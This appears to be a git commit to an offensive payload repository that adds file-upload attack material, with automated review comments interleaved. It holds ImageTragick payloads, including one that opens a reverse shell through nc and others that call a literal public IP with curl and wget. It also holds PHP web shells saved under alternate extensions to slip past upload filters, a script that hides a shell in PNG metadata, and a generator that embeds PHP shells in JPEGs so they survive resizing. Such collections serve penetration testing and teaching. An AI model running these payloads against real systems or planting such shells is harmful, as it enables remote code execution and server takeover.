Upload payloads

This commit is contained in:
swisskyrepo 2016-10-18 18:13:23 +07:00
parent a76711ed59
commit 22b68979b4
70 changed files with 233 additions and 9 deletions


@ -6,7 +6,6 @@ TODO:
* Upload
* Traversal Directory
* Tar
* SSRF
* PHP Serialization
* CSV Injection
@ -14,5 +13,6 @@ To improve:
* RCE
* SQL injection
* XXE
* SSRF
# /!\ Work in Progress : 1%


@ -0,0 +1,4 @@
push graphic-context
viewbox 0 0 640 480
fill 'url(http://localhost:PORT/)'
pop graphic-context


@ -0,0 +1,9 @@
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="640px" height="480px" version="1.1"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink=
"http://www.w3.org/1999/xlink">
<image xlink:href="https://example.com/image.jpg&quot;|/bin/nc.traditional 127.0.0.1 4242 -e /bin/bash&quot;"
x="0" y="0" height="640px" width="480px"/>
</svg>



@ -0,0 +1,4 @@
push graphic-context
viewbox 0 0 640 480
fill 'url(https://pre09.example.net/15bd/th/pre/f/2012/237/c/7/all_work_and_no_something/someting_by_nebezial-d5cdlor.jpg";curl "92.222.81.2)'
pop graphic-context
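Review bot: The `fill 'url(...)'` line ends with `curl "92.222.81.2`, a literal public address rather than a placeholder, so anyone who runs this sample unmodified sends a request to a host they do not control; the same address appears in the `image over` sample that follows (`wget -O- 92.222.81.2:1337`). The first MVG sample in this commit already uses `localhost:PORT` for the same role, and I would use that convention in both files, e.g. `fill 'url(https://example.com/image.jpg";curl "<CALLBACK_HOST>)'`. Presumably the address is a leftover from the original author's test setup; a line in the README naming the placeholder would make the expectation explicit.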


@ -0,0 +1,4 @@
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/oops.jpg"|touch "rce1)'
pop graphic-context


@ -0,0 +1,4 @@
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'https://127.0.0.1/x.php?x=`wget -O- 92.222.81.2:1337 > /dev/null`'
pop graphic-context

5
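--- a/Upload/JPG Resize/README.txt
+++ b/Upload/JPG Resize/README.txt
@@ -0,0 +1,5 @@
+# How to use
+b.php?c=ls
+Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l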
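Review bot: The usage line `b.php?c=ls` names a file the generator never produces — bulletjpg.py writes `exploit-jpg/exploit-<quality>.jpg`, and the top-level README in this commit gives `test.php?c=ls` for the same sample — so a reader cannot tell what `b.php` refers to. I would add one line stating which generated file the name stands for. The README also omits the script's runtime requirements, which the script itself does not state either: it is Python 2 only (print statements, `except IOError,e`) and depends on the `gd` binding, which is not part of the standard library; a line such as `Requires Python 2 and the python-gd binding` would save the next reader a failed run.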

128
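--- a/Upload/JPG Resize/bulletjpg.py
+++ b/Upload/JPG Resize/bulletjpg.py
@@ -0,0 +1,128 @@
+#!/usr/bin/python
+"""
+Bulletproof Jpegs Generator
+Copyright (C) 2012 Damien "virtualabs" Cauquil
+This program is free software; you can redistribute it and/or modify
+it under the terms of the GNU General Public License as published by
+the Free Software Foundation; either version 2 of the License, or
+(at your option) any later version.
+This program is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+GNU General Public License for more details.
+You should have received a copy of the GNU General Public License along
+with this program; if not, write to the Free Software Foundation, Inc.,
+51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+"""
+import struct,sys,os
+import gd
+from StringIO import StringIO
+from random import randint,shuffle
+from time import time
+# image width/height (square)
+N = 32
+def insertPayload(_in, _out, payload,off):
+"""
+Payload insertion (quick JPEG parsing and patching)
+"""
+img = _in
+# look for 'FF DA' (SOS)
+sos = img.index("\xFF\xDA")
+sos_size = struct.unpack('>H',img[sos+2:sos+4])[0]
+sod = sos_size+2
+# look for 'FF D9' (EOI)
+eoi = img[sod:].index("\xFF\xD9")
+# enough size ?
+if (eoi - sod - off)>=len(payload):
+_out.write(img[:sod+sos+off]+payload+img[sod+sos+len(payload)+off:])
+return True
+else:
+return False
+if __name__=='__main__':
+print "[+] Virtualabs' Nasty bulletproof Jpeg generator"
+print " | website: http://virtualabs.fr"
+print " | contact: virtualabs -at- gmail -dot- com"
+print ""
+payloads = ["<?php system(/**/$_GET['c'/**/]); ?>","<?php /**/system($_GET[chr(99)/**/]); ?>","<?php system(/**/$_GET[chr(99)]); ?>","<?php\r\nsystem($_GET[/**/'c']);\r\n ?>"]
+# make sure the exploit-jpg directory exists or create it
+if os.path.exists('exploit-jpg') and not os.path.isdir('exploit-jpg'):
+print "[!] Please remove the file named 'exploit-jpg' from the current directory"
+elif not os.path.exists('exploit-jpg'):
+os.mkdir('exploit-jpg')
+# start generation
+print '[i] Generating ...'
+for q in range(50,100)+[-1]:
+# loop over every payload
+for p in payloads:
+# not done yet
+done = False
+start = time()
+# loop while not done and timeout not reached
+while not done and (time()-start)<10.0:
+# we create a NxN pixels image, true colors
+img = gd.image((N,N),True)
+# we create a palette
+pal = []
+for i in range(N*N):
+pal.append(img.colorAllocate((randint(0,256),randint(0,256),randint(0,256))))
+# we shuffle this palette
+shuffle(pal)
+# and fill the image with it
+pidx = 0
+for x in range(N):
+for y in range(N):
+img.setPixel((x,y),pal[pidx])
+pidx+=1
+# write down the image
+out_jpg = StringIO('')
+img.writeJpeg(out_jpg,q)
+out_raw = out_jpg.getvalue()
+# now, we try to insert the payload various ways
+for i in range(64):
+test_jpg = StringIO('')
+if insertPayload(out_raw,test_jpg,p,i):
+try:
+# write down the new jpeg file
+f = open('exploit-jpg/exploit-%d.jpg'%q,'wb')
+f.write(test_jpg.getvalue())
+f.close()
+# load it with GD
+test = gd.image('exploit-jpg/exploit-%d.jpg'%q)
+final_jpg = StringIO('')
+test.writeJpeg(final_jpg,q)
+final_raw = final_jpg.getvalue()
+# does it contain our payload ?
+if p in final_raw:
+# Yay !
+print '[i] Jpeg quality %d ... DONE'%q
+done = True
+break
+except IOError,e:
+pass
+else:
+break
+if not done:
+# payload not found, we remove the file
+os.unlink('exploit-jpg/exploit-%d.jpg'%q)
+else:
+break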
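Review bot: `except IOError,e: pass` inside the offset loop swallows every failure of the write-and-reload step, so an unwritable `exploit-jpg` directory or a GD that cannot open the candidate is indistinguishable from "payload did not survive the re-encode"; at minimum the script should report it, e.g. `except IOError as e: print '[!] %s' % e`. `randint(0,256)` is inclusive at both ends, so each colour component passed to `colorAllocate` can be 256, outside the 0-255 range; `randint(0,255)` is the intended bound on all three. The rendering has dropped the file's indentation, so which loop each trailing `else: break` belongs to cannot be confirmed from this view; as printed, `os.unlink('exploit-jpg/exploit-%d.jpg'%q)` can also run when no candidate was ever written for that quality, which raises OSError. The script is Python 2 only (print statements, `StringIO`, the `except X,e` form) and depends on the third-party `gd` binding, neither of which the module docstring states; one line under the licence header would do.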

BIN
Upload/JPG Resize/exploit--1.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-52.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-53.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-54.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-55.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-56.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-57.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-58.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-59.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-60.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-61.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-62.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-63.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-64.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-65.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-66.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-67.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-68.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-69.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-70.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-71.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-72.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-73.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-74.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-75.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-76.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-77.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-78.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-79.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-80.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-81.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-82.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-83.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-84.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-85.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-86.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-87.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-88.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-89.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-90.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-91.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-92.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-93.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-94.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-95.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-96.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-97.jpg Executable file

Binary file not shown.


BIN
Upload/JPG Resize/exploit-98.jpg Executable file

Binary file not shown.


Binary file not shown.


BIN
Upload/Metadata GIF/shell_fr.gif Executable file

Binary file not shown.


Binary file not shown.



@ -0,0 +1,30 @@
from PIL import Image
# Shellcodes - Bypass included : Keyword Recognition : System, GET, php
# --- How to use : http://localhost/shell.php?c=echo%20'<pre>';ls
#shellcode = "<?=@`$_GET[c]`;"
shellcode = "<?php system($_GET['c']); ?>"
# --- How to use : http://localhost/shell.php?_=system&__=echo%20'<pre>';ls
shellcode2 = "<?='Sh3ll'; $_='{';$_=($_^'<').($_^'>;').($_^'/');?><?=${'_'.$_}['_'](${'_'.$_}['__']);?>"
print "\n[+] Advanced Upload - Shell inside metadatas of a PNG file"
# Create a backdoored PNG
print " - Creating a payload.png"
im = Image.new("RGB", (10,10), "Black")
im.info["shell"] = shellcode
reserved = ('interlace', 'gamma', 'dpi', 'transparency', 'aspect')
# undocumented class
from PIL import PngImagePlugin
meta = PngImagePlugin.PngInfo()
# copy metadata into new object
for k,v in im.info.iteritems():
if k in reserved: continue
meta.add_text(k, v, 0)
im.save("payload.png", "PNG", pnginfo=meta)
print "Done"
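Review bot: `shellcode2` is assigned on the line after the `$_GET['c']` payload but never referenced, and the commented-out `#shellcode = "<?=@...` alternative above it is dead code, so a reader cannot tell which variant the script is meant to embed; keep one and delete the rest, or document the choice in the `# Shellcodes` comment. The mid-file `from PIL import PngImagePlugin` belongs next to the `from PIL import Image` at the top, and the script is Python 2 only (`print` statements, `im.info.iteritems()`), which nothing in the file states — a header line such as `# Requires Python 2 and Pillow` would do. Note also that the top-level README in this commit describes the PNG payload as driven by `$_GET[0]`/`$_POST[1]`, whereas this script embeds `$_GET['c']`; presumably the README refers to one of the binary PNGs committed without a generator, and it should say so.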

Binary file not shown.



@ -0,0 +1 @@
<?php echo "Shell";system($_GET['cmd']); ?>

1
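--- a/Upload/PHP Extension/Shell.pht
+++ b/Upload/PHP Extension/Shell.pht
@@ -0,0 +1 @@
+<?php echo "Shell";system($_GET['cmd']); ?>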


@ -0,0 +1 @@
<?php echo "Shell";system($_GET['cmd']); ?>


@ -0,0 +1 @@
<?php echo "Shell";system($_GET['cmd']); ?>


@ -0,0 +1 @@
<?php echo "Shell";system($_GET['cmd']); ?>

BIN
Upload/PHP Extension/shell.pgif Executable file

Binary file not shown.


Binary file not shown.


Binary file not shown.



@ -1,12 +1,43 @@
# Title
Lorem
## Vuln
# Upload
Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
## Exploits
Image Tragik
```
Code
HTTP Request
Reverse Shell
Touch command
```
PHP Extension
```
.php
Less known extension
.pht
.pgif
.phtml
.shtml
Double extension
.jpeg.php
.png.php
```
PNG Bypass a resize - Upload the picture and use a local file inclusion
```
You can use it by specifying $_GET[0] as shell_exec and passing a $_POST[1] parameter with the shell command to execute.
curl 'http://localhost/b.php?0=shell_exec' --data "1='ls'"
curl 'http://localhost/test.php?0=system' --data "1='ls'"
```
JPG Bypass a resize - Upload the picture and use a local file inclusion
```
http://localhost/test.php?c=ls
```
## Thanks to
* Lorem
* Ipsum
* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil
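Review bot: The "PNG Bypass a resize" block describes a payload driven by `$_GET[0]` as the function name and `$_POST[1]` as its argument, but the PNG generator added in this commit embeds `<?php system($_GET['c']); ?>`, so one of the two is wrong unless the block refers to one of the binary PNGs committed without a source; each usage line should name the file it applies to. `Image Tragik` is a misspelling of ImageTragick, the name under which the ImageMagick samples are known. The "Thanks to" list still carries the `Lorem`/`Ipsum` template placeholders next to the real credit. Which of the opening lines (`# Title`, `Lorem`, `## Vuln`) were removed and which kept cannot be told from this rendering, so I have not treated them as new content.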